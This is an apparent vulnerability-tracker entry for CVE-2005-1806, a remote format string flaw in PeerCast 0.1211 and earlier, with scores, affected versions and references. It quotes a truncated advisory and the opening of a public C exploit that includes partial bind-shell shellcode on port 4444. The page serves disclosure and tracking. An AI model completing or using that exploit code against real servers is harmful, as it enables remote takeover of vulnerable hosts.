CVE-2005-1806
published 2005-05-28CVE-2005-1806: Format string vulnerability in PeerCast 0.1211 and earlier allows remote attackers to execute arbitrary code via format strings in the URL.
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
11.94%
95.6th percentile
Format string vulnerability in PeerCast 0.1211 and earlier allows remote attackers to execute arbitrary code via format strings in the URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| peercast | peercast | <= 0.1211 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Peercast < 0.1211 - Format String
exploitdb·2015-05-28·CVSS 7.5
CVE-2005-1806 [HIGH] Peercast < 0.1211 - Format String
Peercast < 0.1211 - Format String
---
Peercast Format String Vulnerability
Vendor: peercast.org
Product: Peercast
Version: <= 0.1211
Website: http://www.peercast.org/
BID: 13808
CVE: CVE-2005-1806
OSVDB: 16906
SECUNIA: 15536
PACKETSTORM: 39355
Description:
Peercast is a popular p2p streaming media server (similar to shoutcast). There is a serious security issue in peercast versions 0.1211 and earlier that may allow for an attacker to execute arbitrary code on the remote target with the privileges of the user running peercast (usually administrator) or crash the vulnerable server. There is an updated version of peercast available and all users should upgrade as soon as possible.
Format String Vulnerability:
There is a very dangerous format string issue in peercast that may allow for
Exploit-DB
PeerCast 0.1211 - Remote Format String
exploitdb·2005-06-20
CVE-2005-1806 PeerCast 0.1211 - Remote Format String
PeerCast 0.1211 - Remote Format String
---
/*
\ PeerCast >]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************
//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111746603629979&w=2http://secunia.com/advisories/15536http://secunia.com/advisories/15753http://www.gentoo.org/security/en/glsa/glsa-200506-15.xmlhttp://www.gulftech.org/?node=research&article_id=00077-05282005http://www.peercast.org/forum/viewtopic.php?p=11596http://www.vupen.com/english/advisories/2005/0651http://marc.info/?l=bugtraq&m=111746603629979&w=2http://secunia.com/advisories/15536http://secunia.com/advisories/15753http://www.gentoo.org/security/en/glsa/glsa-200506-15.xmlhttp://www.gulftech.org/?node=research&article_id=00077-05282005http://www.peercast.org/forum/viewtopic.php?p=11596http://www.vupen.com/english/advisories/2005/0651
2005-05-28
Published